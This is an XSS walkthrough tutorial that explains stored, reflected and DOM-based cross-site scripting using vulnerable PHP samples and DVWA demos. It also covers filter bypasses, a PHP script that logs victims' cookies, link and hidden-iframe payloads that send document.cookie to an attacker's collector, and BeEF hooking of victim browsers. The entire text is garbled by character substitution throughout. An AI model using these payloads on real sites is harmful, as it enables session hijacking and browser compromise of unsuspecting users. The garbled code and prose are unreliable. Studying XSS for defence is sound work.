Complete Cross-site Scripting Walkthrough

Author : Ahmed Elhady Mohamed

Email : ahmed.elhady.mohamed@gmail.com
website: www.inosec!all.tk
blog : www."nosec!all.blogspot.com#

$%& 'ntroduction
wikipedia deinition or (SS is )Cross-site scripting *XSS+ is a type o computer insecurity
,ulnerability typically ound in Web applications *such as web browsers through breaches o browser
security+ that enables attackers to in-ect client-side script into Web pages ,iewed by other users.
A cross-site scripting ,ulnerability may be used by attackers to bypass access controls such as the
same origin policy. Cross-site scripting carried out on websites accounted or roughly ./.01 o all
security ,ulnerabilities documented by Symantec as o 2//3.4heir eect may range rom a petty
nuisance to a signiicant security risk5 depending on the sensiti,ity o the data handled by the
,ulnerable site and the nature o any security mitigation implemented by the site6s owner.7
Simply 6(SS6 also known as 6CSS6 *Cross Site Scripting5 Easily conused with 6Cascading Style
Sheets6+ is a ,ery common ,ulnerability ound in Web Applications5 6(SS6 allows the attacker to
in-ect malicious code 5 the reason o that is the de,eloper trusts user inputs5 or mis iltering issues 5
then send back user input data to the client browser so the malicious code will e8ecute.
$%& (SS is 9angerous
(SS is really dangerous 5 it6s se,erity is :igh5 because it could change the website 9;M and could
lead to stealing credentials o the administrator 5 in these cases the attacker can control and
compromise the whole application.
$%& What does the attacker want to achie,e<
Changing Setting
Cookie thet
=alse Ad,ertising
Steal a =orm 4okens to make CS>= Easier
And more 5 you ha,e to be creati,e to e8ploit (SS.

$%& (SS 4ype
4here are 4hree 4ypes o (SS
?ersistent *Stored+ (SS
Attack is stored on the website5s ser,er
@on ?ersistent *relect+ (SS
user has to go through a special link to be e8posed
9;M-based (SS
problem e8ists within the client-side script
we will discuss each kind o these in details 5 as you will see.
$%& ?ersistent *Stored+ (SS

wikipedia deinition :4he persistent *or stored+ (SS ,ulnerability is a more de,astating ,ariant o
a cross-site scripting law: it occurs when the data pro,ided by the attacker is sa,ed by the ser,er5
and then permanently displayed on AnormalA pages returned to other users in the course o regular
browsing5 without proper :4MB escaping. A classic e8ample o this is with online message boards
where users are allowed to post :4MB ormatted messages or other users to read.
Simply ?ersistent (SS is occurs when the de,eloper stores the user input data into database ser,er
or simply writing it in a ile without a proper iltration 5 then sending them again to the client
browser.

$%& ?ersistent *Stored+ (SS 9emo
:ere is a ?:? code that suers orm ?ersistent (SS:
C<php
i*isset*DE?;S4$6btnSign6&++
F
DmessageGtrim*DE?;S4$6mt8Message6&+H
DnameGtrim*DE?;S4$6t8t@ame6&+H
## SanitiIe message input
Dmessage G stripslashes*Dmessage+H
Dmessage G mysJlErealEescapeEstring*Dmessage+H

## SanitiIe name input
Dname G mysJlErealEescapeEstring*Dname+H
DJuery G A'@SE>4 '@4; guestbook *comment5name+ KABLES *
6Dmessage656Dname6+HAH
DresultGmysJlEJuery*DJuery+ or die*6CpreM6.mysJlEerror*+.6C#preM6+H
N
<M
the two parameters in that code )message7 and )name7 are not sanitiIed properly 5the 5we store these
parameters into the guestbook table5 So when we displaying these parameters back the client browser5
it will e8ecute the malicious Oa,aScript code.
=or 9emonstrating this we will e8ploit 9KWA application.

Ater Submitting this orm 5 ;ur OS code has been e8ecuted

:ere we are in-ecting our Oa,aScript code
CscriptMalert*)here is stored (SS7+HC#scriptM
$%& @on ?ersistent *>elected+ (SS

Wikipedia deinition 4he non-persistent *or reflected+ cross-site scripting ,ulnerability is by ar the
most common type. 4hese holes show up when the data pro,ided by a web client5 most commonly
in :44? Juery parameters or in :4MB orm submissions5 is used immediately by ser,er-side scripts
to generate a page o results or that user5 without properly sanitiIing the reJuest.
$%& @on ?ersistent *>elected+ (SS 9emo
:ere is a php code that suers orm >elected (SS
C<php
i*ParrayEkeyEe8ists*AnameA5DEQE4+ R RDEQE4$6name6& GG @LBB RR DEQE4$6name6&GG66+F
DisemptyGtrueH
N
elseF
echo 6CpreM6H
echo 6:ello6 . DEQE4$6name6&H
echo 6C#preM6H
N

<M
AS you can see that the )name7 parameter doesn6t sanitiIed and echo back to the user 5 so when the
user in-ect a malicious OS code 5 't will e8ecute.
@ow we will in-ect our malicious -s Code 5 =or demonstrating we will in-ect
CscriptMalert*#8ss#+C#scriptM =or 9emonstrating this we will e8ploit 9KWA application

will in-ect an alert bo8 Code )CscriptMalert*A8ssA+C#scriptM7

:ere is the ,ulnerable bo8
[+] DOM based XSS
Wikipedia deinition is 9;M-based ,ulnerabilities occur in the content processing stages perormed
by the client5 typically in client-side Oa,aScript. 4he name reers to the standard model or
representing :4MB or (MB contents which is called the 9ocument ;b-ect Model *9;M+
Oa,aScript programs manipulate the state o a web page and populate it with dynamically-computed
data primarily by acting upon the 9;M.

simply that type occurs on the -a,ascript code itsel that the de,eloper use in client side or e8ample
AA typical e8ample is a piece o Oa,aScript accessing and e8tracting data rom the L>B ,ia the
location.S 9;M5 or recei,ing raw non-:4MB data rom the ser,er ,ia (MB:ttp>eJuest5 and then
using this inormation to write dynamic :4MB without proper escaping5entirely on client side.A

:ere is the url :
8ssEr#<nameGAMCscriptMalert*A8ssA+C12=scriptM
[+] DOM based XSS Demo
Suppose the ollowing code is used to create a orm to let the user choose his#her preerred language.
A deault language is also pro,ided in the Juery string5 as the parameter )deault7. we will use the
ollowing code or demonstration purposes:
CselectM
CscriptM
document.write*AC;?4';@ ,alueG"MA%document.location.hre.substring
*document.location.hre.inde8;*AdeaultGA+%.+%AC#;?4';@MA+H
document.write*AC;?4';@ ,alueG2MEnglishC#;?4';@MA+H
C#scriptM
C#selectM
4he page is in,oked with a L>B such as: http:##www.some.site#page.html<deaultG=rench

A 9;M Tased (SS attack against this page can be accomplished by sending the ollowing L>B to
a ,ictim: http:##www.some.site#page.html<deaultGCscriptMalert*document.cookie+C#scriptM

4he original Oa,ascript code in the page does not e8pect the deault parameter to contain :4MB
markup5 and as such it simply echoes it into the page *9;M+ at runtime. 4he browser then renders
the resulting page and e8ecutes the attackerUs script:

alert*document.cookie+
@ow we6,e discussed all types o (SS 5 so lets talk about some ad,anced techniJues.
[+] Advanced Techniques
there are some a,oidance 4echniJues can be taken to protect a against (SS e8ploits but they are not
implementing well or e8ample :
4ons o sites may seem ,ulnerable but not e8ecuting the code that occurs because some kind o
iltration methods and those may can be bypassed 5we will demonstrate most o them.

[+] MT!OD " # rep$ace %script& 'ith nu$$ string ((

here is the ,ulnerable code that suers rom relected 8ss 5 that has a iltration :
C<php
i*ParrayEkeyEe8ists *AnameA5 DEQE4+ RR DEQE4$6name6& GG @LBB RR DEQE4$6name6& GG 66+F
Disempty G trueH
N else F
echo 6CpreM6H
echo 6:ello 6 . strEreplace*6CscriptM65 665 DEQE4$6name6&+H
echo 6C#preM6H
N
<M

as you can see 5in the pre,ious code 5 the de,eloper replace the string that called ACscriptMA with
a @ull string AA .
Some common methods to bypass ilteration is that you -ust ha,e to replace the string ACscriptMA
with ACSC>'?4MA because the de,eloper search or lowercase o ACscriptMA 5 so we bypass
it by change our script to CSC>'?4M.......C#SC>'?4M

:ere is an other way to bypass the pre,ious ilteration
Cscript typeGte8t#-a,ascriptMalert*A(SSA+C#scriptM
?lease note its bad practice to use alert*A(SSA+ to test or (SS because most o known sites block
the keyword (SS beore.

[+]MT!OD ) # magic quotes *i$tration
in this 4echniJue 5 the de,eloper uses techniJue that called magic Juotes iltration 5by using
a ?:? unction called Aaddslashes*+A that add slash beore any special chars. So ;ur traditional
Oa,aScript code doesn6t work
there are many ways to bypass that ilter 5 we will discuss two o them

"- the easiest way to bypass it is Oust 9;@4 LSE magic Juotes simple is that 5 or e8ample
declaring a ,ariable and assigned 5 it to a number 5 then alert that ,ariable.

AS you can see here: CscriptM,ar ,alG "H alert*,al+C#scriptM

2- this way is some what tricky 5 in this way we use a built-in =unction that con,ert 9ecimal ,alues
into ASC'' ,alues 5 you can ind a complete table o ASC'' here http:##www.asciitable.com#
this will help you write what you want ;> you can use hackbar iro8 add-ons to help you on
con,erting ASC'' to decimal 'n my e8amples ill be writing A(SSA this is the ollowing code
A"2/ ""0 ""0A5 ;k we now got the 9ecimal ,alue o our string5we need to know what unction '
n -a,ascript con,erts this to ASC'' this unction called AString.romCharCode*+A5and to use this with
alert as e8ample 5 you dont need to use Juotes any more.

CscriptMalert*String.romCharCode*"2/5 ""05 ""0+C#scriptM
;k now this will display or message in this case A(SSA5 this method is ,ery useul or bypassing
magic Juotes.
[+]!o' Can an Attac+er Stea$ coo+ies,
At irst glance you hear about Stealing Cookies 5 you may think it need a hard work to
implement or e,en to understand 5 but i tell you that is so simple 5 -ust you will need
some programming background and (SS Kulnerability 5Simple is that .

the Scenario o stealing cookie is that 5 We will create a ?:? ile called collectEcookie.php
then we will upload it to any webhosting company 5 ater that we will in-ect a -a,a script
code that will send Cookies to our malicious website 5 When the php ile recie,e the
Cookie inormation 5 it will sa,e it in aile called stolenEcookie.t8t
4o can steal cookie 5 we need to some issues :
A ?:? Script that will recie,e the cookie
the -a,ascript code that will steal the cookie and send it to our malicious site
a web hosting company that will host our php ile
[+] -irst # co$$ect.coo+ie/php
:ere is the ?:? script that will use5 to collecting Cookie and sa,e them into stolenEcookie.t8t
C<php
DcollectedCookieGD:44?EQE4EKA>S$AcookieA&H
DdateGdate*Al ds o = V h:i:s AA+H
DuserEagentGDESE>KE>$6:44?ELSE>EAQE@46&H
DileGopen*6stolenEcookie.t8t656a6+H
write*Dile5A9A4E:Ddate RR LSE> AQE@4:DuserEagent RR C;;W'E:Dcookie XnA+H
close*Dile+H
echo 6CbMSorry 5 this page is under constructionC#bMC#brMC#brM?lease ClickCa
hreGAhttp:##www.google.com#AMhereC#aM to go back to pre,ious page 6H
<M
So lets understand what the script will do :
DcollectedCookieGD:44?EQE4EKA>S$AcookieA&H
in this line we will store the data that is stored in a get ,ariable called cookie then
store it in a,ariable called collectedCookie
DdateGdate*Al ds o = V h:i:s AA+H
here we store the date o the connection ;ccurs 5 it tells us when these cookies ha,e been
stolen.

DuserEagentGDESE>KE>$6:44?ELSE>EAQE@46&H
here we store the userEagent o the ,ictim or urther attacks i it needs to.
DileGopen*6stolenEcookie.t8t656a6+H
here we create a ile called stolenEcookie.t8t that has ,ictim6s cookie inormation
write*Dile5A9A4E:Ddate RR LSE> AQE@4:DuserEagent RR C;;W'E:DcollectedCookie XnA+H
here we sa,e the data as this ormat *)9A4E: RR LSE> AQE@4 RR C;;W'E7+
close*Dile+H
her we close the ile handle
echo 6CbMSorry 5 this page is under constructionC#bMC#brMC#brM?lease ClickCa
hreGAhttp:##www.google.com#AMhereC#aM to go back to pre,ious page 6H
here we print message on the screen *)Sorry 5 this page is under construction7+
and gi,e him a link to click on it that send it to google.
:ere we ha,e inished the irst ilecthat will collect the cookie inormation
[+] Second # 0avascript code
:ere is the Oa,aScript code that we will in-ect into the ,ictim ser,er or browser.
We can in-ect any one o these scripts :
Ca onclickGAdocument.locationG6http:##"23././."#collectEcookie.php<
cookieG6%escape*document.cookie+HA hreGAYAMClick here or 9etailsC#aM
this script need user interaction because it print a link to the user 5 i the user
clicks on that link 5the redirection to our site with the cookie inormation will be
9one.
Cirame widthG6/6 heightG6/6 rameborderG6/6
srcG6CscriptMdocument.locationG6http:##"23././."#collectEcookie.php<
cookieG6%escape*document.cookie+HC#scriptM6 #M
4his script doesn6t need user interaction 5here we will in-ect an irame in the
,ictim website and it6s hidden so the ,ictim can6t see that 5and the connection
will be done.

=inally we will ind the cookie by browsing the ile that called stolenEcookie.t8t
:ere is a ,ideo that demonstrate how to steal a cookie :
http:##www.youtube.com#watch<,GZeByOnhI!ak

[+] 1hat is 2e-,
TeE= is acronym or Trowser E8ploitation =ramework 5 it6s used to collect alot o Iombies
and do alot o e8citing attacks on those Iombies 5 that gi,e us agreat en,iroment because
it makes the hard work instead o us.
4hanks to a web application known as bee *Trowser e8ploitation ramework+ that helps
us to collect a lot o Iombies*the ,ictim in a botnet is called a Iombie+ and it6s an easy
an automated process.
here is the deination o TeE= rom the ;icial site :
)4he Trowser E8ploitation =ramework *TeE=+ is a powerul proessional security tool.
TeE= is pioneering techniJues that pro,ide the e8perienced penetration tester with practical
client side attack ,ectors. Lnlike other security rameworks5 TeE= ocuses on le,eraging
browser ,ulnerabilities to assess the security posture o a target. 4his pro-ect is de,eloped
solely or lawul research and penetration testing.
TeE= hooks one or more web browsers as beachheads or the launching o directed command
modules. Each browser is likely to be within a dierent security conte8t5 and each conte8t
may pro,ide a set o uniJue attack ,ectors. 4he ramework allows the penetration tester to
select speciic modules *in real-time+ to target each browser5 and thereore each conte8t.
4he ramework contains numerous command modules that employ TeE=6s simple and
powerul A?'. 4his A?' is at the heart o the ramework6s eecti,eness and eiciency.
't abstracts comple8ity and acilitates Juick de,elopment o custom modules.7
Vou can dowload TeE= rom http:##beepro-ect.com#

[+] !o' to use 2e-,
Tee is installed by deault in Tack4rack 0 >2 distribution 5 you can download it rom
the oicial site: http:##www.backtrack-linu8.org#downloads# 5 4o open and conigure it
click on the application menu button and then go to Tacktrack -M E8ploitation 4ools -M
Social Engineering 4ools-MTeE= (SS =ramework-MFTee ;> bee-@QN.
we will discuss bee-ng 5 Ater running the page we will see some thing like that

4hen you can browse the bee control banel rom http:##"23./.".":[///#ui#panel
and use username and password )bee7#7bee7

Vou will need to in-ect that Oa,aScript code to the ,ictim ser,er or client to can
hook the Iombies 5 here is the code :
Cscript typeG7te8t#-a,ascript7 srcG7http:##"23././.":[///#hook.-s7MC#scriptM
:ere you can ined the hooked and online Iombie

:ere you can see the hooked browsers
lets take alook to Command tab

:ere is the commands tab that has all modules and e8ploits

As you can see there are alot o e8ploit sections you can use5=or e8ampe we will
use a module misc-Malert dialog 5 you can choose any module you wanna use
here is the result as we e8pected 5 the alert bo8 is e8ecuted and the message is poped up

now as you can see its automated process 5 -ust all you need is to conigure and module
then launch it 5 Simple is that.it deser,es to mention there is a metasploit integration with
bee 5 you can see a metasploit module in the commands tab5it deser,es a try to igure out
how strong is that5go to metasploit 5 you will see a page where you can choose any o
metasploit e8ploits and payloads and set the options or the payload.
=or more inormation about bee 5 you can ind the wiki page here :
https:##github.com#beepro-ect#bee#wiki

$%& Conclusion
as we can see our OS code has been e8ecuted5 so we can e8ecute any malicious OS shellcodes
that are out there on the '@4E>@E45 TeE= Qi,es tons o unctionalities to the attacker 5 so
we can do collect inormation or urther attacks 5could reach to get a remote shell.
We6,e inished this tutorials and i hope they are useul or you guys and there are a lot o
Qreat and e8citing 4utorials5will be out there.